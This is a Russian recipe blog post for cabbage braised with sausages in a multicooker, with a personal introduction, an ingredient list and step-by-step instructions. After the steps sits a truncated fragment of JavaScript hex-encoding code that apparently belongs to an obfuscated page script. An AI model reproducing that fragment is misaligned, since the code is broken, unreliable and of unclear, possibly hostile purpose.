Капуста с сосиской в мультиварке

На приготовление этого блюда меня вдохновил , не поверите, сериал «Великая», про Екатерину Вторую, да. Там гвардейцам передали угощенье пасхальное от Петра Третьего , немецкий стайл такой, сосиски, с капустой, и они его возмущенно отвергли и забраковали))).

А я чего-то увидела, и так мне захотелось, ужас, вот она, пресловутая «великая сила искусства»!

Сосиски у меня ребенок очень любит, поэтому в холодильнике они были, хорошие, дорогие. И капуста тоже имелась. А готовить конечно же в мультиварке, где ж еще? Добавила томата, немного специй, так душевно получилось. И картофельного пюре на гарнир сварила, обожаю его с тшеной капустой, хоть со свежей,хоть с квашеной. А вы?

Ингредиенты:

1.Капуста 700 грамм

2.Сосиски 200 грамм

3.Лук 1 шт.

4.Томат паста 2 ст.л.

5.Растительное масло 2 ст.л.

6.Лавровый лист 2 шт.

7.Душистый перец горошком 2 шт.

8.Черный перец горошком 5 шт.

9.Тмин 1\2 ч.л.

10.Соль

11.Сахар

Готовим!

1.В чаше мультиварке хорошенько нагреваем масло в режиме жарки. Обжариваем сосиски, естественно в натуральной оболочке которые. Подрумяниваем и вынимаем, пусть пока полежат .

2.Лук нарезаем четверть кольцами и отправляем в масло на обжарку. Пассеруем до румяности, слегка присыпав сахаром. Пока лук обжаривается, тоненько шинкуем капусту. К обжаренному луку кладем томат пасту, перемешиваем, и добавляем капусту. Сюда же отправляем лавровый лист, душистый и черный перец, соль и тмин и хорошо перемешиваем.

3.Переключаем на режим тушения и готовим 45 минут. Вообще время приготовления зависит от капусты, пробуйте, может будет и быстрее готова, а может и дольше. В конце тушения добавляем сосиски, перемешиваем и даем им минут 10 прогреться. Не забываем про картофельное пюре!

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o

Читайте также:

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *